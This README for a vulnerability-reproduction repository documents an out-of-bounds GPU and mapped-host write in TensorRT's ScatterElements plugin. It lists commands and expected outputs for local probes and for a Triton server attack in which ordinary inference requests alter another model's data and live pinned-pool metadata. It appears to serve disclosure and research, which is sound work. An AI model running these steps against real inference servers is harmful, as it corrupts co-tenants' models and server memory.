| library_name: tensorrt | |
| tags: | |
| - security-research | |
| - vulnerability-reproduction | |
| - tensorrt | |
| - triton-inference-server | |
| # TensorRT ScatterElements GPU and mapped-host OOB write PoC | |
| This repository demonstrates that the stock TensorRT `ScatterElements` plugin uses runtime indices in GPU pointer arithmetic without normalization or bounds validation. | |
| Tested configurations: | |
| - TensorRT `11.1.0.106` on Windows | |
| - TensorRT `10.16.1.11` on Linux | |
| - Triton Inference Server `2.69.0` with TensorRT `10.16.1.11` | |
| - NVIDIA RTX 3080 Laptop GPU | |
| The artifacts are synthetic. They do not execute host code or access files. | |
| ## Local primitive | |
| Build the engine and run the local proof: | |
| ```bash | |
| python make_engine.py | |
| python run_probe.py | |
| ``` | |
| The proof checks three cases: | |
| 1. An out-of-range positive index updates a separate CUDA allocation. | |
| 2. The index `-1`, which is documented as valid, writes before the start of the output buffer instead of selecting its last element. | |
| 3. An in-range control leaves the marker allocation unchanged. | |
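For comparison, the three cases can be held against what a bounds-checked implementation would do with the same indices. The following is a minimal host-side sketch in Python, not the plugin's code: `normalize_index` is a hypothetical helper, and the axis length of 8 is an assumed value chosen only for illustration. It maps negative indices into range and rejects anything outside `[-dim, dim - 1]`.

```python
def normalize_index(index: int, dim: int) -> int:
    """Map an index in [-dim, dim - 1] to [0, dim - 1]; reject anything else.

    Hypothetical helper for illustration; not taken from TensorRT.
    """
    if not -dim <= index < dim:
        raise IndexError(f"index {index} is out of range for axis of size {dim}")
    return index + dim if index < 0 else index


DIM = 8  # assumed axis length, for illustration only

# Case 2: -1 should select the last element of the axis.
last = normalize_index(-1, DIM)

# Case 3: an in-range index passes through unchanged.
control = normalize_index(3, DIM)

# Case 1: an out-of-range positive index should be rejected, not dereferenced.
try:
    normalize_index(DIM + 100, DIM)
    rejected = False
except IndexError:
    rejected = True

print(last, control, rejected)  # prints: 7 3 True
```

In this sketch the check runs before any address is computed, so an invalid index never reaches pointer arithmetic.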
| `host_pinned_probe.py` additionally targets a benign `cudaHostAllocPortable` marker through its CUDA device mapping: | |
| ```bash | |
| python host_pinned_probe.py | |
| ``` | |
| Expected result: | |
| ```text | |
| CROSS_ALLOCATION_WRITE=True | |
| VALID_NEGATIVE_INDEX_OOB_WRITE=True | |
| CONTROL_CLEAN=True | |
| MAPPED_HOST_WRITE=True | |
| ``` | |
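When comparing a run against the expected result, a small checker can save reading the output by eye. This is a sketch that assumes the probe scripts print exactly the `KEY=True` / `KEY=False` lines shown above; `parse_flags` and `all_flags_set` are hypothetical names, not part of the repository.

```python
EXPECTED_FLAGS = (
    "CROSS_ALLOCATION_WRITE",
    "VALID_NEGATIVE_INDEX_OOB_WRITE",
    "CONTROL_CLEAN",
    "MAPPED_HOST_WRITE",
)


def parse_flags(text: str) -> dict[str, bool]:
    """Parse KEY=True / KEY=False lines and ignore everything else."""
    flags = {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and value in ("True", "False"):
            flags[key] = value == "True"
    return flags


def all_flags_set(text: str) -> bool:
    """Return True only if every expected flag is present and True."""
    flags = parse_flags(text)
    return all(flags.get(name, False) for name in EXPECTED_FLAGS)


sample = """\
CROSS_ALLOCATION_WRITE=True
VALID_NEGATIVE_INDEX_OOB_WRITE=True
CONTROL_CLEAN=True
MAPPED_HOST_WRITE=True
"""

print(all_flags_set(sample))  # prints: True
```

A missing flag counts as a failure here, so output from only one of the two scripts will not pass.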
| ## Triton cross-model proof | |
| The Linux plans were built with TensorRT `10.16.1.11`: | |
| - `scatter_elements_trt10.plan` | |
| - `victim_slow_trt10.plan` | |
| `start_triton.sh` expects the official Triton `2.69.0` standalone bundle under `~/triton-2.69/server/tritonserver` and the Python environment under `~/triton-2.69/venv`. | |
| Run the control and attack: | |
| ```bash | |
| # control (index 0) | |
| ./start_triton.sh | |
| python triton_setup.py | |
| python triton_race_probe.py --skip-load 0 200 0.0 | |
| # attack (index 740), against a fresh Triton process | |
| ./start_triton.sh | |
| python triton_setup.py | |
| python triton_race_probe.py --skip-load 740 200 0.0 | |
| ``` | |
| `triton_setup.py` uses Triton's model-load API to automate operator setup. With `--skip-load`, `triton_race_probe.py` makes no model-control request; the attack phase consists solely of ordinary inference requests to the deployed `scatter_writer` model while a co-resident model is executing. | |
| Expected result: | |
| ```text | |
| # control | |
| victim_before=31343.25 | |
| victim_after=31343.25 | |
| TARGET_CHANGED=False | |
| # attack | |
| victim_before=31343.25 | |
| victim_after=32680.5 | |
| TARGET_CHANGED=True | |
| ``` | |
| The fixed index `740` was reproduced against fresh, uninstrumented Triton processes. `cuda_trace.c` is included only to document how the relative GPU offset was initially measured; it is not loaded for the final control or attack runs. | |
| The same primitive reaches Triton's CUDA-pinned host pool. `triton_host_metadata_output.txt` records a remote inference request changing a live pool metadata word at `0x204c00030` from `0x10000000` to `0x44a72800`. GDB was used only to read the before/after bytes; the server and attack request were uninstrumented. | |
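The numbers reported above can be cross-checked with a little arithmetic. Reinterpreting the post-request metadata word `0x44a72800` as an IEEE-754 single-precision float gives `1337.25`, which equals the change in the victim value in the attack output (`32680.5 - 31343.25`). That both observations stem from the same update value is an inference from the figures, not something the repository states. The sketch below uses only the standard library; `word_as_float32` is a hypothetical helper name.

```python
import struct


def word_as_float32(word: int) -> float:
    """Reinterpret a 32-bit unsigned word as an IEEE-754 single-precision float."""
    return struct.unpack("<f", struct.pack("<I", word))[0]


after_word = 0x44A72800   # pool metadata word after the request (quoted above)
victim_before = 31343.25  # from the Triton attack output
victim_after = 32680.5

decoded = word_as_float32(after_word)
delta = victim_after - victim_before

print(decoded, delta)  # prints: 1337.25 1337.25
```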
| ## Evidence | |
| - `windows_stock_output.txt`: local TensorRT 11.1 proof | |
| - `linux_stock_output.txt`: local TensorRT 10.16 proof | |
| - `triton_control_output.txt`: 200 in-range inference requests | |
| - `triton_attack_repeatability.txt`: three fresh Triton attack runs | |
| - `windows_host_pinned_output.txt` and `linux_host_pinned_output.txt`: mapped host-marker writes | |
| - `triton_host_metadata_output.txt`: remote write into live Triton pinned-pool metadata | |
| ## SHA-256 | |
| ```text | |
| 02cc96cfa0c55c21058c0266ec85f72326f0c19cf245f01dac95f858d20c16fd scatter_elements.engine | |
| 37640bd4f3d153cb23e3e147f8127d7ce0558065fd09de21593d9a26f52bc4ae scatter_elements_trt10.plan | |
| 1f51adc48f98615d548a5a3a7f0f320e3c1b23e7f48205b21554ba850379d7b0 victim_slow_trt10.plan | |
| ``` | |
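To confirm that downloaded artifacts match these digests before loading them, the files can be hashed locally. The following is a minimal sketch using Python's standard `hashlib`; it assumes the three files sit in the current directory, and `sha256_of` and `verify` are hypothetical helper names.

```python
import hashlib
from pathlib import Path

# Digests copied from the list above.
EXPECTED = {
    "scatter_elements.engine": "02cc96cfa0c55c21058c0266ec85f72326f0c19cf245f01dac95f858d20c16fd",
    "scatter_elements_trt10.plan": "37640bd4f3d153cb23e3e147f8127d7ce0558065fd09de21593d9a26f52bc4ae",
    "victim_slow_trt10.plan": "1f51adc48f98615d548a5a3a7f0f320e3c1b23e7f48205b21554ba850379d7b0",
}


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large engine files are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify(directory: Path) -> dict[str, str]:
    """Return a status per expected file: 'ok', 'mismatch', or 'missing'."""
    results = {}
    for name, expected in EXPECTED.items():
        path = directory / name
        if not path.is_file():
            results[name] = "missing"
        else:
            results[name] = "ok" if sha256_of(path) == expected else "mismatch"
    return results


if __name__ == "__main__":
    for name, status in verify(Path(".")).items():
        print(f"{status:8} {name}")
```

Any status other than `ok` means the file is absent or differs from the one the evidence files describe.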